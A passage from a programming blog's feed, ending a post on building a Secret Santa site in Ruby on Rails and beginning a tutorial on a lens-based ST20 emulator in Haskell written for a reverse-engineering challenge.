<ul>
<li>go to the homepage;</li>
<li>create a new event;</li>
<li>fill in info: names, emails, constraints;</li>
<li>click send;</li>
<li>emails are sent.</li>
</ul>
<p>It is actually a bit more complicated since it also handles edition, but overall
it is a very simple website. With the Rails Tutorial almost done I had enough to
build it. Actually, Secret Santa Creator is even simpler since it does not
require authentication. I did it mostly using Test-Driven Development, as in the
tutorial.</p>
<p>The hardest part was definitely creating nested forms. Every event has a list of
participants, and a list of constraints. It is thus necessary to create a form
that can edit this list structure, by directly editing participants or
constraints from the “edit event” form, but also removing or adding some.</p>
<p>I found the <a href="https://github.com/nathanvda/cocoon">cocoon</a> gem which works fine for this, and I could build this kind
of form:</p>
<figure>
<img src="/img/rails/nested.png" alt="Nested forms with cocoon" />
<figcaption aria-hidden="true">Nested forms with cocoon</figcaption>
</figure>
<p>To send email in my Python script MVP, I just piped stuff to <code>sendmail</code>.
Fortunately, Ruby on Rails has an integrated system to do that, with Action
Mailer. You just need to setup SMTP configuration and write <code>rails generate mailer</code> and boom, you can send emails. Heroku has a plugin for sendgrid with a
reasonable free tier, so I used that.</p>
<p>Coding the actual website took approximately two days. It is possible to be that
fast only because Rails insists that easy tasks should become no-brainers.</p>
<p>You can see the site <a href="https://secretsantacreator.herokuapp.com/">here</a> and <a href="https://github.com/emillon/secret-santa">the source on Github</a>.</p>
<p>It works reasonably fine, barring a few quirks in the UI. I used it myself to
organize several events this year, and a couple friends did the same. I would
call that a success! I plan to work a bit more on it at the end of the year and
try to get a little more users. I am curious to see how it goes!</p>]]></description>
    <pubDate>Fri, 03 Apr 2015 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2015-04-03-santa-made-me-learn-rails-in-a-week.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>A lens-based ST20 emulator</title>
    <link>http://blog.emillon.org/posts/2015-08-20-a-lens-based-st20-emulator.html</link>
    <description><![CDATA[<p>Every year, as part of the <a href="https://www.sstic.org/">SSTIC conference</a>, there is
a forensics/reverse engineering challenge. I participated in the 2015 edition.
Though I did not manage to complete it, I made an emulator for the exotic ST20
architecture, which is probably worth describing here.</p>
<figure>
<img src="/img/st20/t00f.png" alt="Some programs will loop. It’s OK." />
<figcaption aria-hidden="true">Some programs will loop. It’s OK.</figcaption>
</figure>
<p>Note that this emulator is not really optimized for pure speed. In the actual
challenge I actually had to rewrite it as pure Haskell (i.e., removing the
emulation part) so that it was faster. Instead, the goal of this article is to
show a few techniques to write powerful emulators in Haskell.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="ot">{-# LANGUAGE GeneralizedNewtypeDeriving #-}</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="ot">{-# LANGUAGE Rank2Types #-}</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="ot">{-# LANGUAGE TemplateHaskell #-}</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Applicative</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Concurrent</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Monad.RWS</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Lens</span> <span class="kw">hiding</span> (imap, op)</span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Data.Bits</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Data.Int</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Data.Maybe</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Data.Word</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Numeric</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">System.Exit</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">System.IO</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Text.Printf</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="kw">qualified</span> <span class="dt">Data.ByteString</span> <span class="kw">as</span> <span class="dt">BS</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="kw">qualified</span> <span class="dt">Data.Map</span> <span class="kw">as</span> <span class="dt">M</span></span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="kw">qualified</span> <span class="dt">Data.Set</span> <span class="kw">as</span> <span class="dt">S</span></span></code></pre></div>
<h2 id="the-evaluation-monad">The evaluation monad</h2>
<p>This program uses Template Haskell to define lenses, so unfortunately we need to
start with a few type definitions.</p>
<p>The ST20’s memory goes from <code>0x80000000</code> to <code>0x7fffffff</code>:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> <span class="dt">Address</span> <span class="ot">=</span> <span class="dt">Int32</span></span></code></pre></div>
<p>We’ll represent the memory using a map. The performance is surprisingly close to
that of an array. It is possible to get significantly speeds up memory access by
using an <code>IOUArray</code> but it turns loads and stores become monadic operations and
makes it impossible to use lenses.</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> <span class="dt">Mem</span> <span class="ot">=</span> <span class="dt">M.Map</span> <span class="dt">Address</span> <span class="dt">Word8</span></span></code></pre></div>
<p>As we’ll see, <em>transputers</em> (hardware threads) can communicate together. We’ll
be able to connect it either between them, or to a tty.</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">IChannel</span> <span class="ot">=</span> <span class="dt">InChan</span> (<span class="dt">Chan</span> <span class="dt">Word8</span>)</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a>              <span class="op">|</span> <span class="dt">InHandle</span> <span class="dt">Handle</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">OChannel</span> <span class="ot">=</span> <span class="dt">OutChan</span> (<span class="dt">Chan</span> <span class="dt">Word8</span>)</span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a>              <span class="op">|</span> <span class="dt">OutHandle</span> <span class="dt">Handle</span></span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> <span class="dt">IChannelMap</span> <span class="ot">=</span> [(<span class="dt">Int32</span>, <span class="dt">IChannel</span>)]</span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> <span class="dt">OChannelMap</span> <span class="ot">=</span> [(<span class="dt">Int32</span>, <span class="dt">OChannel</span>)]</span></code></pre></div>
<p>All evaluations take place in a <code>Eval</code> Monad which is a monad transformer stack
with the following capabilities:</p>
<ul>
<li>read and write an <code>EvalState</code> value;</li>
<li>read an <code>EvalEnv</code> value</li>
<li>do some I/O.</li>
</ul>
<div class="sourceCode" id="cb5"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="kw">newtype</span> <span class="dt">Eval</span> a <span class="ot">=</span> <span class="dt">Eval</span> (<span class="dt">RWST</span> <span class="dt">EvalEnv</span> () <span class="dt">EvalState</span> <span class="dt">IO</span> a)</span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a>    <span class="kw">deriving</span> ( <span class="dt">Functor</span></span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a>             , <span class="dt">Monad</span></span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a>             , <span class="dt">MonadIO</span></span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a>             , <span class="dt">MonadReader</span> <span class="dt">EvalEnv</span></span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a>             , <span class="dt">MonadState</span> <span class="dt">EvalState</span></span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a>             )</span>
<span id="cb5-8"><a href="#cb5-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb5-9"><a href="#cb5-9" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">EvalEnv</span> <span class="ot">=</span></span>
<span id="cb5-10"><a href="#cb5-10" aria-hidden="true" tabindex="-1"></a>    <span class="dt">EvalEnv</span></span>
<span id="cb5-11"><a href="#cb5-11" aria-hidden="true" tabindex="-1"></a>        {<span class="ot"> envInChans ::</span> <span class="dt">IChannelMap</span></span>
<span id="cb5-12"><a href="#cb5-12" aria-hidden="true" tabindex="-1"></a>        ,<span class="ot"> envOutChans ::</span> <span class="dt">OChannelMap</span></span>
<span id="cb5-13"><a href="#cb5-13" aria-hidden="true" tabindex="-1"></a>        }</span>
<span id="cb5-14"><a href="#cb5-14" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb5-15"><a href="#cb5-15" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">EvalState</span> <span class="ot">=</span></span>
<span id="cb5-16"><a href="#cb5-16" aria-hidden="true" tabindex="-1"></a>    <span class="dt">EvalState</span></span>
<span id="cb5-17"><a href="#cb5-17" aria-hidden="true" tabindex="-1"></a>        {<span class="ot"> _iptr ::</span> <span class="op">!</span><span class="dt">Address</span></span>
<span id="cb5-18"><a href="#cb5-18" aria-hidden="true" tabindex="-1"></a>        ,<span class="ot"> _intStack ::</span> [<span class="dt">Int32</span>]</span>
<span id="cb5-19"><a href="#cb5-19" aria-hidden="true" tabindex="-1"></a>        ,<span class="ot"> _wptr ::</span> <span class="op">!</span><span class="dt">Int32</span></span>
<span id="cb5-20"><a href="#cb5-20" aria-hidden="true" tabindex="-1"></a>        ,<span class="ot"> _mem ::</span> <span class="op">!</span><span class="dt">Mem</span></span>
<span id="cb5-21"><a href="#cb5-21" aria-hidden="true" tabindex="-1"></a>        }</span>
<span id="cb5-22"><a href="#cb5-22" aria-hidden="true" tabindex="-1"></a><span class="op">$</span>(makeLenses &#39;<span class="dt">&#39;EvalState</span>)</span>
<span id="cb5-23"><a href="#cb5-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb5-24"><a href="#cb5-24" aria-hidden="true" tabindex="-1"></a><span class="ot">runEval ::</span> <span class="dt">Mem</span> <span class="ot">-&gt;</span> <span class="dt">IChannelMap</span> <span class="ot">-&gt;</span> <span class="dt">OChannelMap</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> a <span class="ot">-&gt;</span> <span class="dt">IO</span> a</span>
<span id="cb5-25"><a href="#cb5-25" aria-hidden="true" tabindex="-1"></a>runEval memory imap omap (<span class="dt">Eval</span> m) <span class="ot">=</span></span>
<span id="cb5-26"><a href="#cb5-26" aria-hidden="true" tabindex="-1"></a>    <span class="fu">fst</span> <span class="op">&lt;$&gt;</span> evalRWST m env st</span>
<span id="cb5-27"><a href="#cb5-27" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb5-28"><a href="#cb5-28" aria-hidden="true" tabindex="-1"></a>            env <span class="ot">=</span> <span class="dt">EvalEnv</span> imap omap</span>
<span id="cb5-29"><a href="#cb5-29" aria-hidden="true" tabindex="-1"></a>            st <span class="ot">=</span></span>
<span id="cb5-30"><a href="#cb5-30" aria-hidden="true" tabindex="-1"></a>                 <span class="dt">EvalState</span></span>
<span id="cb5-31"><a href="#cb5-31" aria-hidden="true" tabindex="-1"></a>                     { _iptr <span class="ot">=</span> memStart</span>
<span id="cb5-32"><a href="#cb5-32" aria-hidden="true" tabindex="-1"></a>                     , _intStack <span class="ot">=</span> []</span>
<span id="cb5-33"><a href="#cb5-33" aria-hidden="true" tabindex="-1"></a>                     , _wptr <span class="ot">=</span> <span class="bn">0xaaaaaaaa</span></span>
<span id="cb5-34"><a href="#cb5-34" aria-hidden="true" tabindex="-1"></a>                     , _mem <span class="ot">=</span> memory</span>
<span id="cb5-35"><a href="#cb5-35" aria-hidden="true" tabindex="-1"></a>                     }</span></code></pre></div>
<p>The above <code>$(...)</code> is a Template Haskell splice. It creates <em>lenses</em> based on
the record declaration of <code>EvalState</code>. Lenses are a very powerful tool that
makes it possible to compose record reads and updates in a functional way. Here,
it defines a lens for each record field; for example, the splice expands to a
top-level declaration <code>iptr :: Lens' EvalState Address</code>. But we will define our
own lenses too, and everything will remain composable.</p>
<h2 id="memory">Memory</h2>
<p>This is naturally adapted to byte access:</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="ot">memByteOpt ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> (<span class="dt">Maybe</span> <span class="dt">Word8</span>)</span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a>memByteOpt addr <span class="ot">=</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a>  mem <span class="op">.</span> at addr</span></code></pre></div>
<p>See? We composed the <code>mem</code> lens (between an evaluation state and a memory state) with <code>at addr</code>, which is a lens between a memory state and the value at address <code>addr</code>.
Well, not exactly: <code>at</code> actually returns a <code>Maybe Word8</code>. We will assume that
all memory accesses will succeed, so we want a lens that returns a plain
<code>Word8</code>. To achieve this, we can compose with a lens that treats <code>Maybe a</code> as a
container of <code>a</code>:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="ot">maybeLens ::</span> <span class="dt">Lens&#39;</span> (<span class="dt">Maybe</span> a) a</span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a>maybeLens <span class="ot">=</span> lens fromJust (<span class="fu">const</span> <span class="dt">Just</span>)</span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a><span class="ot">memByte ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Word8</span></span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a>memByte addr <span class="ot">=</span></span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a>  memByteOpt addr <span class="op">.</span> maybeLens</span></code></pre></div>
<p>Sometimes we will also need to access memory word by word. To achieve that, we
first define conversion functions.</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="ot">bytesToWord ::</span> (<span class="dt">Word8</span>, <span class="dt">Word8</span>, <span class="dt">Word8</span>, <span class="dt">Word8</span>) <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a>bytesToWord (b0, b1, b2, b3) <span class="ot">=</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a>    <span class="fu">sum</span> [ <span class="fu">fromIntegral</span> b0</span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a>        , <span class="fu">fromIntegral</span> b1 <span class="ot">`shiftL`</span> <span class="dv">8</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a>        , <span class="fu">fromIntegral</span> b2 <span class="ot">`shiftL`</span> <span class="dv">16</span></span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a>        , <span class="fu">fromIntegral</span> b3 <span class="ot">`shiftL`</span> <span class="dv">24</span></span>
<span id="cb8-7"><a href="#cb8-7" aria-hidden="true" tabindex="-1"></a>        ]</span>
<span id="cb8-8"><a href="#cb8-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb8-9"><a href="#cb8-9" aria-hidden="true" tabindex="-1"></a><span class="ot">wordToBytes ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> (<span class="dt">Word8</span>, <span class="dt">Word8</span>, <span class="dt">Word8</span>, <span class="dt">Word8</span>)</span>
<span id="cb8-10"><a href="#cb8-10" aria-hidden="true" tabindex="-1"></a>wordToBytes w <span class="ot">=</span></span>
<span id="cb8-11"><a href="#cb8-11" aria-hidden="true" tabindex="-1"></a>    (b0, b1, b2, b3)</span>
<span id="cb8-12"><a href="#cb8-12" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb8-13"><a href="#cb8-13" aria-hidden="true" tabindex="-1"></a>            b0 <span class="ot">=</span> <span class="fu">fromIntegral</span> <span class="op">$</span> w <span class="op">.&amp;.</span> <span class="bn">0x000000ff</span></span>
<span id="cb8-14"><a href="#cb8-14" aria-hidden="true" tabindex="-1"></a>            b1 <span class="ot">=</span> <span class="fu">fromIntegral</span> <span class="op">$</span> (w <span class="op">.&amp;.</span> <span class="bn">0x0000ff00</span>) <span class="ot">`shiftR`</span> <span class="dv">8</span></span>
<span id="cb8-15"><a href="#cb8-15" aria-hidden="true" tabindex="-1"></a>            b2 <span class="ot">=</span> <span class="fu">fromIntegral</span> <span class="op">$</span> (w <span class="op">.&amp;.</span> <span class="bn">0x00ff0000</span>) <span class="ot">`shiftR`</span> <span class="dv">16</span></span>
<span id="cb8-16"><a href="#cb8-16" aria-hidden="true" tabindex="-1"></a>            b3 <span class="ot">=</span> <span class="fu">fromIntegral</span> <span class="op">$</span> (w <span class="op">.&amp;.</span> <span class="bn">0xff000000</span>) <span class="ot">`shiftR`</span> <span class="dv">24</span></span></code></pre></div>
<p>Then, we can define a lens focusing on a 32-bit value.</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="ot">compose ::</span> [a <span class="ot">-&gt;</span> a] <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> a</span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a>compose <span class="ot">=</span> <span class="fu">foldr</span> (<span class="op">.</span>) <span class="fu">id</span></span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a><span class="ot">get32 ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">EvalState</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a>get32 base s <span class="ot">=</span></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>    bytesToWord (b0, b1, b2, b3)</span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a>            b0 <span class="ot">=</span> s <span class="op">^.</span> memByte base</span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>            b1 <span class="ot">=</span> s <span class="op">^.</span> memByte (base <span class="op">+</span> <span class="dv">1</span>)</span>
<span id="cb9-10"><a href="#cb9-10" aria-hidden="true" tabindex="-1"></a>            b2 <span class="ot">=</span> s <span class="op">^.</span> memByte (base <span class="op">+</span> <span class="dv">2</span>)</span>
<span id="cb9-11"><a href="#cb9-11" aria-hidden="true" tabindex="-1"></a>            b3 <span class="ot">=</span> s <span class="op">^.</span> memByte (base <span class="op">+</span> <span class="dv">3</span>)</span>
<span id="cb9-12"><a href="#cb9-12" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-13"><a href="#cb9-13" aria-hidden="true" tabindex="-1"></a><span class="ot">set32 ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">EvalState</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">EvalState</span></span>
<span id="cb9-14"><a href="#cb9-14" aria-hidden="true" tabindex="-1"></a>set32 base s v <span class="ot">=</span></span>
<span id="cb9-15"><a href="#cb9-15" aria-hidden="true" tabindex="-1"></a>   compose</span>
<span id="cb9-16"><a href="#cb9-16" aria-hidden="true" tabindex="-1"></a>       [ set (memByte base) b0</span>
<span id="cb9-17"><a href="#cb9-17" aria-hidden="true" tabindex="-1"></a>       , set (memByte (base <span class="op">+</span> <span class="dv">1</span>)) b1</span>
<span id="cb9-18"><a href="#cb9-18" aria-hidden="true" tabindex="-1"></a>       , set (memByte (base <span class="op">+</span> <span class="dv">2</span>)) b2</span>
<span id="cb9-19"><a href="#cb9-19" aria-hidden="true" tabindex="-1"></a>       , set (memByte (base <span class="op">+</span> <span class="dv">3</span>)) b3</span>
<span id="cb9-20"><a href="#cb9-20" aria-hidden="true" tabindex="-1"></a>       ] s</span>
<span id="cb9-21"><a href="#cb9-21" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb9-22"><a href="#cb9-22" aria-hidden="true" tabindex="-1"></a>            (b0, b1, b2, b3) <span class="ot">=</span> wordToBytes v</span>
<span id="cb9-23"><a href="#cb9-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-24"><a href="#cb9-24" aria-hidden="true" tabindex="-1"></a><span class="ot">memWord ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Int32</span></span>
<span id="cb9-25"><a href="#cb9-25" aria-hidden="true" tabindex="-1"></a>memWord addr <span class="ot">=</span> lens (get32 addr) (set32 addr)</span></code></pre></div>
<p>The instruction set reference defines a handy operator to shift an address by a
word offset:</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="ot">(@@) ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Address</span></span>
<span id="cb10-2"><a href="#cb10-2" aria-hidden="true" tabindex="-1"></a>a <span class="op">@@</span> n <span class="ot">=</span> a <span class="op">+</span> <span class="dv">4</span> <span class="op">*</span> n</span></code></pre></div>
<p>It will be also handy to access the memory in list chunks:</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb11-1"><a href="#cb11-1" aria-hidden="true" tabindex="-1"></a><span class="ot">mem8s ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> [<span class="dt">Word8</span>]</span>
<span id="cb11-2"><a href="#cb11-2" aria-hidden="true" tabindex="-1"></a>mem8s base len <span class="ot">=</span> lens getList setList</span>
<span id="cb11-3"><a href="#cb11-3" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb11-4"><a href="#cb11-4" aria-hidden="true" tabindex="-1"></a>        getList s <span class="ot">=</span></span>
<span id="cb11-5"><a href="#cb11-5" aria-hidden="true" tabindex="-1"></a>            <span class="fu">map</span> (\ off <span class="ot">-&gt;</span> s <span class="op">^.</span> memByte (base <span class="op">+</span> off)) [<span class="dv">0</span> <span class="op">..</span> len <span class="op">-</span> <span class="dv">1</span>]</span>
<span id="cb11-6"><a href="#cb11-6" aria-hidden="true" tabindex="-1"></a>        setList s0 ws <span class="ot">=</span></span>
<span id="cb11-7"><a href="#cb11-7" aria-hidden="true" tabindex="-1"></a>            compose (<span class="fu">zipWith</span> (\ off w <span class="ot">-&gt;</span> set (memByte (base <span class="op">+</span> off)) w) [<span class="dv">0</span><span class="op">..</span>] ws) s0</span></code></pre></div>
<h2 id="instruction-decoding">Instruction decoding</h2>
<p>Instructions are usually encoded on a single byte: the opcode is in the first
nibble, and a parameter is in the second one. For example this is how a LDC
(load constant) is encoded:</p>
<pre><code>   .--- 0x40 LDC
  |.---          0x5
  ||
0x45         LDC 0x5</code></pre>
<p>This only works for 4-bytes constants. To load bigger constants, there is a
“prefix” operation that will shift the current operand:</p>
<pre><code>   .-------- 0x20 PFX
  |.--------          0x2
  ||
  ||    .--- 0x40 LDC
  ||   |.---          0x5
  ||   ||
0x22 0x45    LDC 0x25</code></pre>
<p>Those are chainable; for example <code>0x21 0x22 0x45</code> encodes <code>LDC 0x125</code>.</p>
<p>Another prefix shifts and complements the current operand value:</p>
<pre><code>   .-------- 0x60 NFX
  |.--------          0x2
  ||
  ||    .--- 0x40 LDC
  ||   |.---          0x5
  ||   ||
0x62 0x45    LDC (~0x25)</code></pre>
<p>The ST20 architecture actually provides two type of instructions:</p>
<ul>
<li>“primary” instructions such as <code>LDC</code>. Their operand is directly encoded.</li>
<li>“secondary” instructions such as <code>MINT</code> (equivalent to <code>LDC 0x80000000</code>).
They do not have operands. On the contrary, they are actually a special case
of the first type, using a special <code>OPR n</code> opcode. For example, <code>MINT</code> is
<code>OPR 0x42</code>, which is encoded using <code>0x24 0xF2</code>.</li>
</ul>
<p>We know enough to draft an instruction decoder.</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">PInstr</span> <span class="ot">=</span> <span class="dt">AJW</span>   <span class="op">|</span> <span class="dt">ADC</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">LDC</span>   <span class="op">|</span> <span class="dt">STL</span></span>
<span id="cb15-3"><a href="#cb15-3" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">LDL</span>   <span class="op">|</span> <span class="dt">LDNL</span></span>
<span id="cb15-4"><a href="#cb15-4" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">LDLP</span>  <span class="op">|</span> <span class="dt">LDNLP</span></span>
<span id="cb15-5"><a href="#cb15-5" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">CJ</span>    <span class="op">|</span> <span class="dt">J</span></span>
<span id="cb15-6"><a href="#cb15-6" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">EQC</span>   <span class="op">|</span> <span class="dt">CALL</span></span>
<span id="cb15-7"><a href="#cb15-7" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">STNL</span></span>
<span id="cb15-8"><a href="#cb15-8" aria-hidden="true" tabindex="-1"></a>    <span class="kw">deriving</span> (<span class="dt">Eq</span>, <span class="dt">Ord</span>, <span class="dt">Show</span>)</span>
<span id="cb15-9"><a href="#cb15-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb15-10"><a href="#cb15-10" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">SInstr</span> <span class="ot">=</span> <span class="dt">PROD</span>  <span class="op">|</span> <span class="dt">MINT</span>   <span class="op">|</span> <span class="dt">GAJW</span></span>
<span id="cb15-11"><a href="#cb15-11" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">LDPI</span>  <span class="op">|</span> <span class="dt">OUT</span>    <span class="op">|</span> <span class="dt">IN</span></span>
<span id="cb15-12"><a href="#cb15-12" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">LB</span>    <span class="op">|</span> <span class="dt">XOR</span>    <span class="op">|</span> <span class="dt">SB</span></span>
<span id="cb15-13"><a href="#cb15-13" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">BSUB</span>  <span class="op">|</span> <span class="dt">SSUB</span>   <span class="op">|</span> <span class="dt">DUP</span></span>
<span id="cb15-14"><a href="#cb15-14" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">GTx</span>   <span class="op">|</span> <span class="dt">WSUB</span>   <span class="op">|</span> <span class="dt">AND</span></span>
